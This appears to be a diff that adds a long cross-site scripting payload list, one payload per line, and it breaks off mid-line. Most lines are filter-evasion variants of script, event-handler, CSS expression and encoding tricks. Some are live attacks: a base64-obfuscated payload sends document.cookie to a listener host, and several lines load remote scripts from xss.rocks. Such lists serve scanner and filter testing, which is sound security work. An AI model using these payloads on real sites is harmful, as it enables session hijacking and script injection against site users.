+<script\x2Ftype="text/javascript">javascript:alert(1);</script> +<script\x0Atype="text/javascript">javascript:alert(1);</script> +ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF +ABC<div style="x:expression\x5C(javascript:alert(1)">DEF +ABC<div style="x:expression\x00(javascript:alert(1)">DEF +ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF +ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF +ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x09expression(javascript:alert(1)">DEF +ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF +ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF +ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF +ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF +ABC<div style="x:\x20expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF +ABC<div style="x:\x00expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF +ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF +ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF +<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> +<a 
href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> +<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> +`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> +`"'><img src=xxx:x \x22onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> +`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> +`"'><img src=xxx:x \x09onerror=javascript:alert(1)> +`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> +`"'><img src=xxx:x \x00onerror=javascript:alert(1)> +`"'><img src=xxx:x \x27onerror=javascript:alert(1)> +`"'><img src=xxx:x \x20onerror=javascript:alert(1)> +"`'><script>\x3Bjavascript:alert(1)</script> +"`'><script>\x0Djavascript:alert(1)</script> +"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> +"`'><script>\xE2\x80\x81javascript:alert(1)</script> +"`'><script>\xE2\x80\x84javascript:alert(1)</script> +"`'><script>\xE3\x80\x80javascript:alert(1)</script> +"`'><script>\x09javascript:alert(1)</script> +"`'><script>\xE2\x80\x89javascript:alert(1)</script> +"`'><script>\xE2\x80\x85javascript:alert(1)</script> +"`'><script>\xE2\x80\x88javascript:alert(1)</script> +"`'><script>\x00javascript:alert(1)</script> +"`'><script>\xE2\x80\xA8javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> +"`'><script>\xE1\x9A\x80javascript:alert(1)</script> +"`'><script>\x0Cjavascript:alert(1)</script> +"`'><script>\x2Bjavascript:alert(1)</script> +"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> +"`'><script>-javascript:alert(1)</script> +"`'><script>\x0Ajavascript:alert(1)</script> +"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> +"`'><script>\x7Ejavascript:alert(1)</script> +"`'><script>\xE2\x80\x87javascript:alert(1)</script> +"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> +"`'><script>\xE2\x80\xA9javascript:alert(1)</script> 
+"`'><script>\xC2\x85javascript:alert(1)</script> +"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x83javascript:alert(1)</script> +"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> +"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> +"`'><script>\xE2\x80\x80javascript:alert(1)</script> +"`'><script>\x21javascript:alert(1)</script> +"`'><script>\xE2\x80\x82javascript:alert(1)</script> +"`'><script>\xE2\x80\x86javascript:alert(1)</script> +"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> +"`'><script>\x0Bjavascript:alert(1)</script> +"`'><script>\x20javascript:alert(1)</script> +"`'><script>\xC2\xA0javascript:alert(1)</script> +"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> +"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> +"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> +"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> +"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> +"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> +"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> +"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> +"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> +<script\x2F>javascript:alert(1)</script> +<script\x20>javascript:alert(1)</script> +<script\x0D>javascript:alert(1)</script> +<script\x0A>javascript:alert(1)</script> +<script\x0C>javascript:alert(1)</script> +<script\x00>javascript:alert(1)</script> +<script\x09>javascript:alert(1)</script> +`"'><img src=xxx:x onerror\x0B=javascript:alert(1)> +`"'><img src=xxx:x onerror\x00=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0C=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0D=javascript:alert(1)> +`"'><img src=xxx:x onerror\x20=javascript:alert(1)> +`"'><img src=xxx:x onerror\x0A=javascript:alert(1)> +`"'><img src=xxx:x onerror\x09=javascript:alert(1)> +<script>javascript:alert(1)<\x00/script> +<img src=# onerror\x3D"javascript:alert(1)" > +<input onfocus=javascript:alert(1) autofocus> +<input 
onblur=javascript:alert(1) autofocus><input autofocus> +<video poster=javascript:javascript:alert(1)// +<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> +<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X +<video><source onerror="javascript:javascript:alert(1)"> +<video onerror="javascript:javascript:alert(1)"><source> +<form><button formaction="javascript:javascript:alert(1)">X +<body oninput=javascript:alert(1)><input autofocus> +<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> +<frameset onload=javascript:alert(1)> +<table background="javascript:javascript:alert(1)"> +<!--<img src="--><img src=x onerror=javascript:alert(1)//"> +<comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> +<![><img src="]><img src=x onerror=javascript:alert(1)//"> +<style><img src="</style><img src=x onerror=javascript:alert(1)//"> +<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> +<head><base href="javascript://"></head><body><a href="/. 
/,javascript:alert(1)//#">XXX</a></body> +<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<object data="data:text/html;base64,%(base64)s"> +<embed src="data:text/html;base64,%(base64)s"> +<b <script>alert(1)</script>0 +<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> +<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> +<embed src="javascript:alert(1)"> +<img src="javascript:alert(1)"> +<image src="javascript:alert(1)"> +<script src="javascript:alert(1)"> +<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x +<? foo="><script>javascript:alert(1)</script>"> +<! foo="><script>javascript:alert(1)</script>"> +</ foo="><script>javascript:alert(1)</script>"> +<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> +<! 
foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> +<% foo><x foo="%><script>javascript:alert(1)</script>"> +<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> +<img \x00src=x onerror="alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x11src=x onerror="javascript:alert(1)"> +<img \x12src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x10src=x onerror="javascript:alert(1)"> +<img\x13src=x onerror="javascript:alert(1)"> +<img\x32src=x onerror="javascript:alert(1)"> +<img\x47src=x onerror="javascript:alert(1)"> +<img\x11src=x onerror="javascript:alert(1)"> +<img \x47src=x onerror="javascript:alert(1)"> +<img \x34src=x onerror="javascript:alert(1)"> +<img \x39src=x onerror="javascript:alert(1)"> +<img \x00src=x onerror="javascript:alert(1)"> +<img src\x09=x onerror="javascript:alert(1)"> +<img src\x10=x onerror="javascript:alert(1)"> +<img src\x13=x onerror="javascript:alert(1)"> +<img src\x32=x onerror="javascript:alert(1)"> +<img src\x12=x onerror="javascript:alert(1)"> +<img src\x11=x onerror="javascript:alert(1)"> +<img src\x00=x onerror="javascript:alert(1)"> +<img src\x47=x onerror="javascript:alert(1)"> +<img src=x\x09onerror="javascript:alert(1)"> +<img src=x\x10onerror="javascript:alert(1)"> +<img src=x\x11onerror="javascript:alert(1)"> +<img src=x\x12onerror="javascript:alert(1)"> +<img src=x\x13onerror="javascript:alert(1)"> +<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> +<img src=x onerror=\x09"javascript:alert(1)"> +<img src=x onerror=\x10"javascript:alert(1)"> +<img src=x onerror=\x11"javascript:alert(1)"> +<img src=x onerror=\x12"javascript:alert(1)"> +<img src=x onerror=\x32"javascript:alert(1)"> +<img src=x onerror=\x00"javascript:alert(1)"> +<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> +<img src="x` `<script>javascript:alert(1)</script>"` `> +<img src onerror /" '"= 
alt=javascript:alert(1)//"> +<title onpropertychange=javascript:alert(1)></title><title title=> +<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> +<!--[if]><script>javascript:alert(1)</script --> +<!--[if<img src=x onerror=javascript:alert(1)//]> --> +<script src="/\%(jscript)s"></script> +<script src="\\%(jscript)s"></script> +<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> +<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X +<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> +<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d +<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> +<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> +<style>*[{}@import'%(css)s?]</style>X +<div style="font-family:'foo&#10;;color:red;';">XXX +<div style="font-family:foo}color=red;">XXX +<// style=x:expression\28javascript:alert(1)\29> +<style>*{x:expression(javascript:alert(1))}</style> +<div style=content:url(%(svg)s)></div> +<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X +<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> +<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X +<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X +<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> +<x style="background:url('x&#1;;color:red;/*')">XXX</x> 
+<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> +<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> +<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> +<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> +<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi +<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> +<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ +X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > +1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" 
to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> 
+<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html 
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> +<Video> <source onerror = "javascript: alert (XSS)"> +<Input value = "XSS" type = text> +<applet code="javascript:confirm(document.cookie);"> +<isindex x="javascript:" onmouseover="alert(XSS)"> +"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +"><img src="x:x" onerror="alert(XSS)"> +"><iframe src="javascript:alert(XSS)"> +<object data="javascript:alert(XSS)"> +<isindex type=image src=1 onerror=alert(XSS)> +<img src=x:alert(alt) onerror=eval(src) alt=0> +<img src="x:gif" onerror="window['al\u0065rt'](0)"></img> +<iframe/src="data:text/html,<svg onload=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert(1)">X +</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> +<style>//*{x:expression(alert(/xss/))}//<style></style> +On Mouse Over​ +<img src="/" =_=" title="onerror='prompt(1)'"> +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<form><button formaction=javascript&colon;alert(1)>CLICKME +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" 
VALUE="javascript:alert(1)"></OBJECT> +<data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4= +<javascript:alert(document.cookie>) +xss=500); alert(document.cookie);// +<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))"> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://66.102.7.147/">XSS</A> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT> +<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT> ++ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> +<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT> +<BASE HREF="javascript:alert('XSS');//"> +<DIV STYLE="width: expression(alert('XSS'));"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<FRAMESET><FRAME 
SRC="javascript:alert('XSS');"></FRAMESET> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K +¼script¾alert(¢XSS¢)¼/script¾ +<XSS STYLE="xss:expression(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*"); +xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<BR SIZE="&{alert('XSS')}"> +<BGSOUND SRC="javascript:alert('XSS');"> +Set.constructor`alert\x28document.domain\x29``` +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG LOWSRC="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<BODY BACKGROUND="javascript:alert('XSS')"> +\";alert('XSS');// +<iframe src=http://xss.rocks/scriptlet.html < +<IMG SRC="`<javascript:alert>`('XSS')" +<SCRIPT SRC=//xss.rocks/.j> +<SCRIPT SRC=http://xss.rocks/xss.js?< B > +<<SCRIPT>alert("XSS");//\<</SCRIPT> +<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT> +<IMG SRC=" &#14; javascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG 